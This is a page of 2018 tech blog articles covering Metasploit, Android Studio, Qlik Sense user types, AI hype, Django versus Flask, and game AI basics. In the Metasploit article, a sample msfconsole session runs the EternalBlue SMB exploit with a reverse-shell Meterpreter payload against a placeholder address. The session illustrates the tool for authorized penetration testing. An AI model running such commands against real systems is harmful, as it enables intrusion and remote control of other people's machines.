Tech Guides

Pentest tool in focus: Metasploit

Savia Lobo
30 May 2018
5 min read
Security over the web is of the highest priority these days, as most of our transactions and storage take place on the web, leaving our systems ripe for cracking by hackers. How can we tighten the security belts around our systems? Metasploit is one solution cybersecurity professionals look to. Metasploit, an open source project, allows individuals or organizations to identify security vulnerabilities and develop code that network administrators can use to break into their own networks and identify potential risks. They can then prioritize which vulnerabilities need to be addressed.

The Metasploit project offers:
- Penetration (pen) testing software
- Tools for automating the comparison of a program's vulnerabilities
- Anti-forensic and advanced evasion tools

Some tools are also built into the Metasploit Framework. The Metasploit Framework is a collection of tools, libraries, modules, and so on. It is popular among cybersecurity professionals and ethical hackers for carrying out penetration testing or hacking. They can use it to exploit vulnerabilities on a network and also to make Trojans, backdoors, botnets, phishing campaigns, and so on. You can check out our article on 12 common malware types you should know to learn about the different malware types.

The Metasploit Framework is supported by various operating systems, including Linux, macOS, Windows, and Android. Metasploit comes in both free and paid versions: the free versions (Metasploit Framework and Metasploit Community) can be used to find basic exploits, while the full paid version (Metasploit Pro) is preferred, as it allows one to carry out deep pen tests and offers other advanced features. The paid version:
- Collects integrations via remote APIs
- Automates several tasks, including smart exploitation and penetration testing reports
- Infiltrates dynamic payloads to evade the top antivirus solutions

In order to use this hacking tool, one can make use of the different interfaces it offers.

Metasploit Interfaces

Msfconsole
Msfconsole is one of the most popular interfaces in the Metasploit Framework. Once you get the hang of this interface and its syntax, it provides coherent access to all the options within the Metasploit Framework. Some advantages of msfconsole include:
- Access to all the features in the MSF
- The most stable, console-based interface
- The ability to execute external commands
- Full readline support, tabbing, and command completion
A sample msfconsole session appears at the end of this section.

Msfcli
Msfcli provides a powerful command-line interface to the framework. Some features of this interface include:
- Support for launching exploits and auxiliary modules
- Great for use in scripts and basic automation
However, one should be careful while using msfcli, as variables are case-sensitive and are assigned using an equals (=) sign.

MsfGUI
Msfgui is the GUI of the framework and a tool for carrying out demonstrations to clients and management. The msfgui:
- Provides a point-and-click interface for exploitation
- Provides a GTK wizard-based interface for using the Metasploit Framework

Armitage
Developed by Raphael Mudge, Armitage is an open source Java-based frontend GUI for the Metasploit Framework. Its primary aim is to help security professionals understand hacking by getting to know the true potential of Metasploit.
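To give a feel for the msfconsole syntax described above, here is a short, hypothetical session; the module and the target address (a reserved documentation IP) are placeholders, and such commands should only ever be run against systems you are authorized to test:

```
msf > search ms17_010
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.0.2.10
RHOST => 192.0.2.10
msf exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) > exploit
```

Note how variables such as RHOST and PAYLOAD are assigned with the equals-style `set` syntax; tab completion works for module paths and option names.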
Advantages of using Metasploit

One can automate each phase of penetration testing
Metasploit allows pentesters and cyber professionals to automate all phases of a penetration test, because the amount of time required to carry out a complete and thorough pen test is huge. Metasploit automates tasks, right from selecting the appropriate exploit to streamlining evidence collection and reporting of the attack.

Credentials can be gathered and reused
Credentials are the keys to any network, and the biggest prize for a penetration tester. With Metasploit, one can catalog and track user credentials for reporting. Professionals and hackers can also reuse these credentials across every system in the network using a simple credential domino wizard.

Become a next-level pen tester
If one has already worked with the Metasploit Framework for years, its Pro version is definitely the next step. With Metasploit Pro, the expert can easily move through a network using its pivoting and antivirus evasion capabilities, and can create instant reports on progress and evidence. Best of all, one can seamlessly use custom scripts by dropping into the command-line framework.

Metasploit in competition with other pentesting tools
Metasploit is not the only tool that offers penetration testing, but it is one of the preferred ones. There are a number of other tools on the market that can give Metasploit tough competition, including Wireshark, Nessus, and Nmap.

Wireshark is a famous network protocol analyzer. It can read captured information from other applications and is multiplatform. Its only con is a steep learning curve.

Nessus is a vulnerability scanner and a popular tool among security professionals. It has a huge library of vulnerabilities and respective tests to identify them. It relies on the response from the target host to identify a breach; here, Metasploit is used as an exploitation tool to check whether the detected breach is actually exploitable.

Nmap (Network Mapper) is a highly competent pen testing tool used for network mapping and discovery, although it has a rudimentary GUI compared to Metasploit.

Metasploit is moving into web application security with its 3.5.0 release. The community has also added native PHP and Java payloads, which make it easy to acquire advanced functionality through web application and Java server vulnerabilities. The community plans to port more exploits and modules to the Metasploit platform, and additional modules that target embedded devices, hardware devices, and bus systems, such as K-Line, could be added in the near future.

Read more:
5 pen testing rules of engagement: What to consider while performing Penetration testing
How to secure a private cloud using IAM
Top 5 penetration testing tools for ethical hackers


What is Android Studio and how does it differ from other IDEs?

Natasha Mathur
30 May 2018
5 min read
Android Studio is a powerful and sophisticated development environment, designed with the specific purpose of developing, testing, and packaging Android applications. It can be downloaded, along with the Android SDK, as a single package. It is a collection of tools and components, many of which are installed and updated independently of each other.

Android Studio is not the only way to develop Android apps; there are other IDEs, such as Eclipse and NetBeans, and it is even possible to develop a complete app using nothing more than Notepad and the command line. This article is an excerpt from the book 'Mastering Android Studio 3', written by Kyle Mew.

Built for a purpose, Android Studio has attracted a growing number of third-party plugins that provide a large array of valuable functions not available directly via the IDE. These include plugins to speed up build times, debug a project over Wi-Fi, and many more. Despite Android Studio being arguably the superior tool, there are some very good reasons for having stuck with another IDE, such as Eclipse. Many developers develop for multiple platforms, which makes Eclipse a good choice of tool, and every developer has deadlines to meet; getting to grips with unfamiliar software can slow them down considerably at first. But Android Studio is the official IDE for Android development, and every Android app developer should be aware of the differences between it and the alternatives, so they can decide what works for them.

How Android Studio differs

There are many ways in which Android Studio differs from other IDEs and development tools. Some of these differences are quite subtle, such as the way support libraries are installed, while others, for instance the build process and the UI design, are profoundly different. Before taking a closer look at the IDE itself, it is a good idea to first understand some of these important differences. The major ones are listed here:

- UI development: The most significant difference between Studio and other IDEs is its layout editor, which is far superior to any of its rivals, offering text, design, and blueprint views; constraint layout tools for every activity or fragment; easy-to-use theme and style editors; and a drag-and-drop design function. The layout editor also provides many tools unavailable elsewhere, such as a comprehensive preview function for viewing layouts on a multitude of devices and simple-to-use theme and translation editors.
- Project structure: Although the underlying directory structure remains the same, the way Android Studio organizes each project differs considerably from its predecessors. Rather than using workspaces as in Eclipse, Studio employs modules that can more easily be worked on together without having to switch workspaces. This difference in structure may seem unusual at first, but any Eclipse user will soon see how much time it can save once it becomes familiar.
- Code completion and refactoring: The way that Android Studio intelligently completes code as you type makes it a delight to use. It regularly anticipates what you are about to type, and often a whole line of code can be entered with no more than two or three keystrokes. Refactoring, too, is easier and more far-reaching than in alternative IDEs, such as Eclipse and NetBeans. Almost anything can be renamed, from local variables to entire packages.
- Emulation: Studio comes equipped with a flexible virtual device editor, allowing developers to create device emulators to model any number of real-world devices. These emulators are highly customizable, both in terms of form factor and hardware configuration, and virtual devices can be downloaded from many manufacturers. Users of other IDEs will already be familiar with Android AVDs, although they will certainly appreciate the preview features found in the Design tab.
- Build tools: Android Studio employs the Gradle build system, which performs the same functions as the Apache Ant system that many Java developers will be familiar with. It does, however, offer a lot more flexibility and allows for customized builds, enabling developers to create APKs that can be uploaded to TestFlight, or to produce demo versions of an app, with ease. It is also the Gradle system that allows for Android Studio's modular nature: rather than each library or third-party SDK being compiled as a JAR file, Studio builds each of these using Gradle.

These are the most far-reaching differences between Android Studio and other IDEs, but there are many other features which are unique. Studio provides the powerful JUnit test facility and allows for cloud platform support and even Wi-Fi debugging. It is also considerably faster than Eclipse, which, to be fair, has to cater to a wider range of development needs as opposed to just one, and it can run on less powerful machines.

Android Studio also provides an amazing time-saving device in the form of Instant Run. This feature cleverly builds only the part of a project that has been edited, meaning that developers can test small changes to code without having to wait for a complete build to be performed for each test. This feature can bring waiting time down from minutes to almost zero.

To know more about Android Studio and how to build faster, smoother, and error-free Android applications, be sure to check out the book 'Mastering Android Studio 3'.

Read more:
The art of Android Development using Android Studio
Getting started with Android Things
Unit Testing apps with Android Studio


Four self-service business intelligence user types in Qlik Sense

Amey Varangaonkar
29 May 2018
7 min read
With the introduction of self-service to BI, there is segmentation at various levels and breadths in how self-service is conducted and to what extent. There are, quite frankly, different user types that differ from each other in level of interest, technical expertise, and the way in which they consume data. While almost every user is unique in the way they use self-service, the user base can be divided into four different groups. In this article, we take a look at the four types of users in a self-service business intelligence model.

The following excerpt is taken from the book Mastering Qlik Sense, authored by Martin Mahler and Juan Ignacio Vitantonio. This book presents expert techniques to design and deploy enterprise-grade Business Intelligence solutions for your business by leveraging the power of Qlik Sense.

Power Users or Data Champions

Power users are the most tech-savvy business users, who show a great interest in self-service BI. They produce and build dashboards themselves and know how to load data and process it to create a logical data model. They tend to be self-learning and carry a hybrid set of skills, usually a mixture of business knowledge and some advanced technical skills. This user group is often frustrated with existing reporting or BI solutions and finds IT inadequate in delivering them. As a result, especially in the past, they have taken data dumps away from IT solutions and created their own dashboards in Excel, using advanced skills such as VBA (Visual Basic for Applications). They generally like to participate in the development process but have been unable to do so due to governance rules and a strict old-school separation of IT from the business.

Self-service BI addresses this group in particular, and identifying those users is key to reaching adoption within an organization. Within an established self-service environment, power users generally participate in committees revolving around the technical environments and represent the business interest. They also develop the bulk of the first versions of the apps, which, as part of a naturally evolving process, are then handed over to more experienced IT staff to be polished and optimized. Power users advocate the self-service BI technology, demonstrating not only the insights and information they manage to extract from their data, but also the efficiency and timeliness of doing so. At the same time, they serve as the first point of contact for other users and consumers when it comes to questions about their apps and dashboards. Sometimes they also participate in a technical advisory capacity on whether other projects are feasible to implement using the same technology. Within a self-service BI environment, it is safe to say that these power users are the pillars of a successful adoption.

Business Users or Data Visualizers

Business users are frequent users of data analytics, whose main goal is to extract value from the data they are presented with. They represent the part of the user base that is interested in conducting data analysis and data discovery to better understand their business, in order to make better-informed decisions. Presentation and ease of use of the application are key for this user group, and they are less interested in building new analytics themselves. That being said, some form of creating new charts and loading data is sometimes still of interest to them, albeit on a very basic level. Timeliness, the relevance of data, and the user experience matter most to them.
They are the ones slicing and dicing the data and drilling down into dimensions, keen to click around in the app to obtain valuable information. Usually, a group of business users belong to the same department and have a power user overseeing them, answering questions and receiving feedback on how the dashboard can be improved even further. Their interaction with IT is mostly limited to requesting access and resolving unexpected technical errors.

Consumers or Data Readers

Consumers usually form the largest user group of a self-service BI analytics solution. They are the end recipients of the insights and data analytics that have been produced and, normally, are only interested in distilled information presented to them in a digested form. They are usually the kind of users who are happy with a report, either digital or in printed form, which summarizes highlights and lowlights in a few pages, requiring no interaction at all. They are also the most sensitive to the timeliness and availability of their reports.

While usually the largest audience, this user group leverages the self-service capabilities of a BI tool the least. This poses a licensing challenge, as those users don't take full advantage of the functionality on offer, but cost the full amount in order to access the reports. It is therefore not uncommon to assign this type of user group a bucket of login access passes, or not give them access to the self-service BI platform at all and instead give them the information they need in (digitally) printed format or within presentations prepared by business users.

IT or Data Overseers

IT represents the technical user group in this context, who sit in the background and develop and manage the framework within which the self-service BI solution operates. They are the backbone of the deployment and ensure the environment is set up correctly to cater to the various use cases required by the user groups described above. At the same time, they ensure a security policy is in place and maintained, and they introduce a governance framework for deployment, data quality, and best practices. They are in effect responsible for overseeing the power users and helping them with technical questions, while also ensuring that terms and definitions, as well as the look and feel, are consistent and maintained across all apps.

With self-service BI, IT plays a lesser role in actually developing the dashboards and assumes a more mentoring position, conducting training, consultation, and advisory in best practices. While working closely with power users, IT also provides technical support to users and liaises with the IT infrastructure team to ensure the server infrastructure is fit for purpose and up and running to serve the users. This also includes upgrading the platform where required and enriching it with additional functionality if and when available.

Bringing them together

The previous four groups can be distinguished within a typical enterprise environment; however, this is not to say hybrid or fewer user groups are not viable models for self-service BI. It is an evolutionary process in how an organization adopts self-service data analytics, with many dependencies on available skills, competing established solutions, culture, and appetite for new technologies. It usually begins with IT being the first users in a newly deployed self-service environment, not only setting up the infrastructure but also developing the first apps for a couple of consumers.
Power users then follow; generally, they are the business sponsors themselves, often big fans of data analytics, modifying the app to their liking and promoting it to their users. The business user base emerges with the success of the solution, as analytics become integrated into their usual business processes. The last group, the consumers, is typically established last and more often than not doesn't have actual access to the platform itself, instead receiving printouts, email summaries with screenshots, or PowerPoint presentations. Due to licensing costs and the size of the consumer audience, it is not always easy to give them access to the self-service platform; hence, most of the time, an automated and streamlined PDF printing process is the most elegant solution to cater to this type of user group.

At the same time, the size of the deployment also determines the number of distinct user groups. In small enterprise environments, it will mostly be power users and IT who use self-service, which greatly simplifies the approach as well as the setup considerations.

If you found the above excerpt useful, make sure you check out the book Mastering Qlik Sense to learn helpful tips and tricks to perform effective Business Intelligence using Qlik Sense.

Read more:
How Qlik Sense is driving self-service Business Intelligence
What we learned from Qlik Qonnections 2018
How self-service analytics is changing modern-day businesses


Does AI deserve to be so Overhyped?

Aaron Lazar
28 May 2018
6 min read
The short answer is yes, and no. The long answer is, well, read on to find out.

Several people have been asking the question, including myself, wondering whether Artificial Intelligence is just another passing fad, like the Google Glass or nanotechnology. The hype for AI began over the past few years, although if you look back at the 60s it seems to have started way back then. In the early 90s and all the way to the early 2000s, a lot of media and television shows were talking about AI quite a bit. Going 25 centuries further back, Aristotle speaks not just of thinking machines but of autonomous ones in his Politics:

"for if every instrument, at command, or from a preconception of its master's will, could accomplish its work (as the story goes of the statues of Daedalus; or what the poet tells us of the tripods of Vulcan, "that they moved of their own accord into the assembly of the gods"), the shuttle would then weave, and the lyre play of itself; nor would the architect want servants, or the [1254a] master slaves."
(Aristotle, Politics: A Treatise on Government, Book 1, Chapter 4)

This imagery of AI has managed to sink into our subconscious minds over the centuries, propelling creative work, academic research, and industrial revolutions toward that goal. The thought of giving machines a mind of their own existed quite long ago, but recent advancements in technology have made it much more clear and realistic.

The Rise of the Machines

The year is 2018. The 4th Industrial Revolution is happening and intelligent automation has taken over. This is the point where I say no, AI is not overhyped. General Electric, for example, is a billion-dollar manufacturing company that has already invested in AI. GE Digital has AI running through several automated systems, and it even has its own IIoT platform called Predix.

Similarly, in the field of healthcare, the implementation of AI is growing in leaps and bounds. The Google DeepMind project is able to process millions of medical records within minutes. Although this kind of research is in its early phase, Google is working closely with the Moorfields Eye Hospital NHS Foundation Trust to implement AI and improve eye treatment. AI startups focused on healthcare and allied areas such as genetic engineering are among the most heavily invested in, and venture-capital supported, in recent times.

Computer vision, or image recognition, is one field where AI has really proven its power. Analysing datasets like Iris has never been easier, paving the way for more advanced use cases like automated quality checks in manufacturing units. In healthcare, AI has helped sift through tonnes of data, helping doctors diagnose illnesses quicker, manufacture more effective and responsive drugs, and monitor patients. The list is endless, clearly showing that AI has made its mark in several industries.

Back (up) to the Future

Now, if you talk about the commercial implementations of AI, they're still quite far-fetched at the moment. Take the same computer vision application, for example. Its implementation will be a huge breakthrough for autonomous vehicles. But if researchers have only managed to obtain 80% accuracy for object recognition on roads, the battle is not close to being won! Even if they do improve, do you think driverless vehicles are ready to drive in the snow, through the rain, or in storms?
I remember, a few years ago, Business Process Outsourcing was one industry, at least in India, that was quite fearful of AI and autonomous systems taking over its jobs. Yet machines are only capable of performing 60-70% of BPO processes in insurance, and with changing customer requirements and simultaneously falling patience levels, those numbers are terrible! It looks like the end of Moore's law is here, for AI I mean. Well, you can't really expect AI to have the same exponential growth that computers did decades ago. There are a lot of unmet expectations in several fields, which has a considerable number of people thinking that AI isn't going to solve their problems now, and they're right. It is probably going to take a few more years to mature, making it a thing of the future, not of the present. Is AI overhyped now? Yeah, maybe?

What I think

Someone once said, hype is a double-edged sword. If it's not enough, innovation may become obscure; if it's too much, expectations will become unreasonable. It's true that AI has several beneficial use cases, but what about the fairness of such systems? Will machines continue to think the way they're supposed to, or will they start finding their own missions that don't involve benefits to the human race? At the same time, there's also the question of security and data privacy. GDPR will come into effect in a few days, but what about the prevailing issues of internet security?

I had an interesting discussion with a colleague yesterday. We were talking about what the impact of AI could be for us as end customers, in a developing and young country like India. Do we really need to fear losing our jobs? Will we be able to reap the benefits of AI directly, or would it be an indirect impact? The answer is, probably yes, but not so soon. If we drew up a hierarchy of needs pyramid for AI, each field would need to climb through several stages before fully leveraging AI: collecting data, storing it effectively, exploring it, aggregating it, optimizing it with the help of algorithms, and then finally achieving AI. That's bound to take a LOT of time!

Honestly speaking, a country like India still lacks AI implementation in several fields. The major customers of AI, apart from some industrial giants, will obviously be the government, although that is sure to take at least a decade or so, keeping in mind the several aspects to be accomplished first. In the meantime, budding AI developers and engineers are scurrying to skill themselves up in the race to be in the cream of the crowd! Similarly, what about the rest of the world? Well, I can't speak for everyone, but if you ask me, AI is a really promising technology, and I think we need to give it some time; allow the industries and organisations investing in it enough time to let it evolve and ultimately benefit us customers, one way or another.

Read more:
You can now make music with AI thanks to Magenta.js
Splunk leverages AI in its monitoring tools


Python web development: Django vs Flask in 2018

Aaron Lazar
28 May 2018
7 min read
A colleague of mine wrote an article over two years ago comparing the two top Python web frameworks, Django and Flask. It's 2018 now, and a lot has changed in the IT world. A couple of frameworks have emerged or gained popularity in the last three years, like Bottle and CherryPy, for example. However, Django and Flask have stood their ground and remain the top two Python frameworks. Moreover, there have been some major breakthroughs in web application architecture, like the rise of microservices, which has in turn pushed the growth of newer architectures like serverless and cloud-native. I thought it would be a good idea to present a more modern comparison of these two frameworks, to help you make an informed decision on which one to choose for your application development.

Before we dive into ripping these frameworks apart, let's briefly go over the factors we'll consider while evaluating them, in no particular order:
- Ease of use
- Popularity
- Community support
- Job market
- Performance
- Modern architecture support

Ease of use

I like to cover this first, because I know it's really important for developers who are just starting out to assess the learning curve before they attempt to scale it. When I talk about ease of use, I mean how easy it is to get started with using the tool in your day-to-day projects. Flask, like its webpage, is a very simple tool to learn, simply because it's built to be simple. Moreover, the framework is unopinionated, meaning that it will allow you to implement things the way you choose, without throwing a fuss. This is really important when you're starting out; you don't want to run into too many issues that will break your confidence as a developer.

On the other hand, Django is a great framework to learn too. While several Python developers will disagree with me, I would say Django is a pretty complex framework, especially for a newbie. That is not all that bad, though; especially when you're building a large project, you want to be the one holding the reins. If you're starting out with some basic projects, it may be wise not to choose Django. The way I see it, learning Flask first will allow you to learn Django much faster.

Popularity

Both frameworks are quite popular, with Django at 34k stars on GitHub and Flask having a slight edge at 36k. If you take a look at Google Trends, both tools follow a pretty similar trend, with Django's volume much higher, owing to its longer existence. (Source: SEMrush)

As mentioned before, Flask is more popular among beginners and those who want to build basic websites easily. On the other hand, Django is more popular among professionals with years of experience building robust websites.

Community Support and Documentation

In terms of community support, we're looking at how involved the community is in developing the tool and providing support to those who need it. This is quite important for someone who's starting out with a tool, or, for that matter, when a new version is released and you need to keep yourself up to date. Django features 170k tagged questions on Stack Overflow, which is over 7 times that of Flask, which stands at 21k. Although Django is a clear winner in terms of numbers, both mailing lists are quite active and you can receive all the help you need quite easily.
When it comes to documentation, Django has some solid documentation that can help you get up and running in no time. Flask has good documentation too, but you usually have to do some digging to find what you're looking for.

Job Scenes

Jobs are really important, especially if you're looking for a corporate one. It's quite natural that the organization hiring you will already be working with a particular stack, and they will expect you to have those skills before you step in. Django records around 2k jobs on Indeed in the USA, while Flask records exactly half that amount. A couple of years ago, the situation was pretty much the same: Django was a prime requirement, while Flask had just started gaining popularity. You'll find comments stating that "Picking up Flask might be a tad easier then Django, but for Django you will have more job openings." Itjobswatch.uk lists Django as the 2nd most needed skill for a Python developer, whereas Flask is way down at 20th. (Source: itjobswatch.uk) Clearly, Django is in more demand than Flask. However, if you are an independent developer, you're still free to choose the framework you wish to work with.

Performance

Honestly speaking, Flask is a microframework, which means it delivers much better performance in terms of speed. This is also because in Flask you could write 10k lines of code for something that would take 24k lines in Django. In a response time comparison for data fetched from a remote server, both tools perform pretty much the same, with Flask holding a slight edge over Django. In a load time comparison for data loaded from a database with an ORM, the gap is quite large, with Flask being much more efficient at loading data from the database.

When we talk about performance, we also need to consider the power each framework provides when you want to build large apps. Django is a clear winner here, as it allows you to build massive, enterprise-grade applications. Django serves as a full-stack framework which can easily be integrated with JavaScript to build great applications; Flask, on the other hand, is not suitable for very large applications. The JetBrains Python Developer Survey 2017 revealed that Django was the more preferred option among respondents.

Modern Architecture Support

The monolith has been broken and microservices have risen. What's interesting is that although applications are huge, they're now composed of smaller services working together to make up the actual application. While you might think Django would be a great framework to build microservices, it turns out that Flask serves much better here, thanks to its lightweight architecture and simplicity. While you work on a huge enterprise application, you might find Flask interwoven wherever a light framework works best. Here's the story of one company that ditched Django for microservices.

I'm not going to score these tools, because they're both awesome in their own right. The difference arises when you need to choose one for your projects, and it's quite evident that Flask should be your choice when you're working on a small project, or maybe a smaller application built into a larger one: a blog, a small website, or a web service.
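To make that point concrete, here is a complete, runnable Flask web service; this is a minimal sketch (the route and names are illustrative), assuming Flask is installed via pip install flask. The Django equivalent would require a project scaffold, a settings module, a URL configuration, and a view:

```python
from flask import Flask, jsonify

app = Flask(__name__)

# A single route returning JSON; this is the entire application.
@app.route("/status")
def status():
    return jsonify({"service": "blog", "status": "ok"})

if __name__ == "__main__":
    # Flask's built-in development server; use a production WSGI server in deployment.
    app.run(port=5000)
```

Run it with `python app.py` and visit http://localhost:5000/status; that brevity is exactly why Flask suits small services and microservices.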
Although, if you’re on the A team, making a super awesome website for maybe, Facebook or a billion dollar enterprise, instead of going the Django unchained route, choose Django with a hint of Flask added in, for all the right reasons. :) Django recently hit version 2.0 last year, while Flask hit version 1.0 last month. Here’s some great resources to get you up and running with Django and Flask. So what are you waiting for? Go build that website! Why functional programming in Python matters Should you move to Python 3.7 Why is Python so good for AI and Machine Learning?


AI for game developers: 7 ways AI can take your game to the next level

Kunal Chaudhari
25 May 2018
21 min read
Artificial Intelligence (AI) is a rich and complex topic. At first glance, it can seem intimidating. Its uses are diverse, ranging from robotics to statistics and, more relevantly for us, entertainment; more specifically, video games. In this article, we will get to know the fundamentals of Artificial Intelligence and why it is important for game developers. We also cover a quick background on AI in academia, traditional domains, and game-specific applications, and will look at the following:
- How the application and implementation of AI in games differs from other domains
- Special requirements for AI in games
- Basic AI patterns used in games

This article is an excerpt from a book written by Ray Barrera, Aung Sithu Kyaw, and Thet Naing Swe titled Unity 2017 Game AI Programming - Third Edition. This book will help you create fun and unbelievable AI entities in your games with A*, fuzzy logic, and NavMesh with Unity 2017.

Leveling up your game with AI

AI in games dates back all the way to the earliest games, even as far back as Namco's arcade hit Pac-Man. The AI was rudimentary at best, but even in Pac-Man, each of the enemies (Blinky, Pinky, Inky, and Clyde) had unique behaviors that challenged the player in different ways. Learning those behaviors and reacting to them adds a huge amount of depth to the game and keeps players coming back, even over 30 years since its release.

It's the job of a good game designer to make the game challenging enough to be engaging, but not so difficult that a player can never win. To this end, AI is a fantastic tool that can help abstract the patterns that entities in games follow to make them seem more organic, alive, and real. Much like an animator through each frame or an artist through his brush, a designer or programmer can breathe life into their creations via clever use of the AI techniques covered in this article.

The role of AI in games is to make games fun by providing challenging entities to compete with, and interesting non-player characters (NPCs) that behave realistically inside the game world. The objective here is not to replicate the whole thought process of humans or animals, but merely to sell the illusion of life and make NPCs seem intelligent by having them react to changing situations inside the game world in a way that makes sense to the player.

Technology allows us to design and create intricate patterns and behaviors, but we're not yet at the point where AI in games even begins to resemble true human behavior. While smaller, more powerful chips, buckets of memory, and even distributed computing have given programmers a much higher computational ceiling to dedicate to AI, at the end of the day, resources are still shared between other operations such as graphics rendering, physics simulation, audio processing, and animation, all in real time. All these systems have to play nice with each other to achieve a steady frame rate throughout the game. Like all the other disciplines in game development, optimizing AI calculations remains a huge challenge for AI developers.

Using AI in Unity

In this section, we'll walk you through the AI techniques used in different types of games. Unity is a flexible engine that provides a number of approaches to implement AI patterns. Some are ready to go out of the box, so to speak, while others we'll have to build from scratch. We'll focus on implementing the most essential AI patterns within Unity so that you can get your game's AI entities up and running quickly.
Learning and implementing the techniques in this article will serve as a fundamental first step into the vast world of AI. Many of the concepts we cover, such as pathfinding and Navigation Meshes, are interconnected and build on top of one another. For this reason, it's important to get the fundamentals right before digging into the high-level APIs that Unity provides.

Defining the agent

Before jumping into our first technique, we should be clear on a key term: the agent. An agent, as it relates to AI, is our artificially intelligent entity. When we talk about our AI, we're not specifically referring to a character, but to an entity that displays complex behavior patterns, which we can refer to as non-random, or in other words, intelligent. This entity can be a character, creature, vehicle, or anything else. The agent is the autonomous entity executing the patterns and behaviors we'll be covering. With that out of the way, let's jump in.

Finite State Machines

Finite State Machines (FSMs) can be considered one of the simplest AI models, and they are commonly used in games. A state machine basically consists of a set number of states that are connected in a graph by the transitions between them. A game entity starts in an initial state and then looks out for the events and rules that will trigger a transition to another state. A game entity can only be in exactly one state at any given time. For example, take an AI guard character in a typical shooting game: its states could be as simple as patrolling, chasing, and shooting.

There are basically four components in a simple FSM:
- States: This component defines a set of distinct states that a game entity or an NPC can choose from (patrol, chase, and shoot)
- Transitions: This component defines relations between different states
- Rules: This component is used to trigger a state transition (player in sight, close enough to attack, and lost/killed player)
- Events: This component triggers checks of the rules (the guard's visible area, distance to the player, and so on)

FSMs are a common go-to AI pattern in game development because they are relatively easy to implement, visualize, and understand. Using simple if/else or switch statements, we can easily implement an FSM, although it can get messy as we add more states and more transitions. A minimal code sketch of the guard's FSM appears after the next section.

Seeing the world through our agent's eyes

In order to make our AI convincing, our agent needs to be able to respond to the events around it: the environment, the player, and even other agents. Much like real living organisms, our agent can rely on sight, sound, and other "physical" stimuli. However, we have the advantage of being able to access much more data within our game than a real organism can from its surroundings, such as the player's location (regardless of whether or not they are in the vicinity), their inventory, the location of items around the world, and any variable you choose to expose to that agent in your code. In the book's accompanying diagram, the agent's field of vision is represented by a cone in front of it, and its hearing range by a grey circle surrounding it.

Vision, sound, and other senses can be thought of, at their most essential level, as data. Vision is just light particles, sound is just vibrations, and so on.
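The book implements its examples in C# within Unity; purely as an illustration, here is a minimal Python sketch of the guard FSM described above, where the rule inputs (player_visible, player_in_range, player_lost) are hypothetical stand-ins for real game queries:

```python
from enum import Enum, auto

class State(Enum):
    PATROL = auto()
    CHASE = auto()
    SHOOT = auto()

class GuardFSM:
    """Guard with three states; a transition fires when its rule is met."""
    def __init__(self):
        self.state = State.PATROL

    def update(self, player_visible, player_in_range, player_lost):
        # Rules are evaluated on every game tick (the triggering "event").
        if self.state == State.PATROL and player_visible:
            self.state = State.CHASE
        elif self.state == State.CHASE:
            if player_in_range:
                self.state = State.SHOOT
            elif player_lost:
                self.state = State.PATROL
        elif self.state == State.SHOOT and not player_in_range:
            self.state = State.CHASE

guard = GuardFSM()
guard.update(player_visible=True, player_in_range=False, player_lost=False)
print(guard.state)  # State.CHASE: the guard spotted the player and gives chase
```

Even this tiny example hints at the scaling problem mentioned above: every new state multiplies the transition checks that have to be hand-wired.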
While we don't need to replicate the complexity of a constant stream of light particles bouncing around and entering our agent's eyes, we can still model the data in a way that produces believable results. As you might imagine, we can similarly model other sensory systems, and not just the ones used by biological beings, such as sight, sound, or smell, but even digital and mechanical systems used by enemy robots or towers, for example sonar and radar. If you've ever played Metal Gear Solid, then you've definitely seen these concepts in action: an enemy's field of vision is denoted on the player's mini-map as a cone-shaped field of view. Enter the cone and an exclamation mark appears over the enemy's head, followed by an unmistakable chime, letting the player know that they've been spotted.

Path following and steering

Sometimes, we want our AI characters to roam around in the game world, following a roughly-guided or thoroughly-defined path. For example, in a racing game, the AI opponents need to navigate the road. In an RTS game, your units need to be able to get from wherever they are to the location you tell them, navigating through the terrain and around each other. To appear intelligent, our agents need to be able to determine where they are going and, if they can reach that point, they should be able to route the most efficient path and modify that path if an obstacle appears as they navigate. Even path following and steering can be represented via a finite state machine; you will then see how these systems begin to tie in. In this article, we cover the primary methods of pathfinding and navigation, starting with our own implementation of an A* Pathfinding System, followed by an overview of Unity's built-in Navigation Mesh (NavMesh) feature.

Dijkstra's algorithm

While perhaps not quite as popular as A* Pathfinding (which we will cover next), it's crucial to understand Dijkstra's algorithm, as it lays the foundation for other similar approaches to finding the shortest path between two nodes in a graph. The algorithm was published by Edsger W. Dijkstra in 1959. Dijkstra was a computer scientist, and though he may be best known for his namesake algorithm, he also had a hand in developing other important computing concepts, such as the semaphore. It might be fair to say Dijkstra probably didn't have StarCraft in mind when developing his algorithm, but the concepts translate beautifully to game AI programming and remain relevant to this day.

So what does the algorithm actually do? In a nutshell, it computes the shortest path between two nodes along a graph by assigning a value to each connected node based on distance. The starting node is given a value of zero. As the algorithm traverses through a list of connected nodes that have not been visited, it calculates the distance to each and assigns that value to the node. If the node had already been assigned a value in a prior iteration of the loop, it keeps the smallest value. The algorithm then selects the connected node with the smallest distance value, and marks the previously selected node as visited, so it will no longer be considered. The process repeats until all nodes have been visited. With this information, you can then calculate the shortest path.

Need help wrapping your head around Dijkstra's algorithm? The University of San Francisco has created a handy visualization tool: https://www.cs.usfca.edu/~galles/visualization/Dijkstra.html.
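Again as an illustration rather than the book's own C# code, here is a compact Python sketch of the procedure just described, using a priority queue over an adjacency-dict graph; the graph literal is made up for the example:

```python
import heapq

def dijkstra(graph, start):
    """Return the shortest distance from start to every reachable node.

    graph maps each node to a dict of {neighbor: edge_cost}.
    """
    dist = {start: 0}               # the starting node is given a value of zero
    frontier = [(0, start)]         # (distance so far, node)
    visited = set()
    while frontier:
        d, node = heapq.heappop(frontier)   # smallest distance value first
        if node in visited:
            continue
        visited.add(node)           # mark as visited; never reconsider
        for neighbor, cost in graph[node].items():
            new_d = d + cost
            if new_d < dist.get(neighbor, float("inf")):
                dist[neighbor] = new_d      # keep the smallest value seen
                heapq.heappush(frontier, (new_d, neighbor))
    return dist

# Hypothetical map: nodes are waypoints, edge costs are distances between them.
graph = {
    "A": {"B": 2, "C": 5},
    "B": {"A": 2, "C": 1, "D": 4},
    "C": {"A": 5, "B": 1, "D": 1},
    "D": {"B": 4, "C": 1},
}
print(dijkstra(graph, "A"))  # {'A': 0, 'B': 2, 'C': 3, 'D': 4}
```

Recording each node's predecessor alongside its distance would let you walk the shortest path back from any target node.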
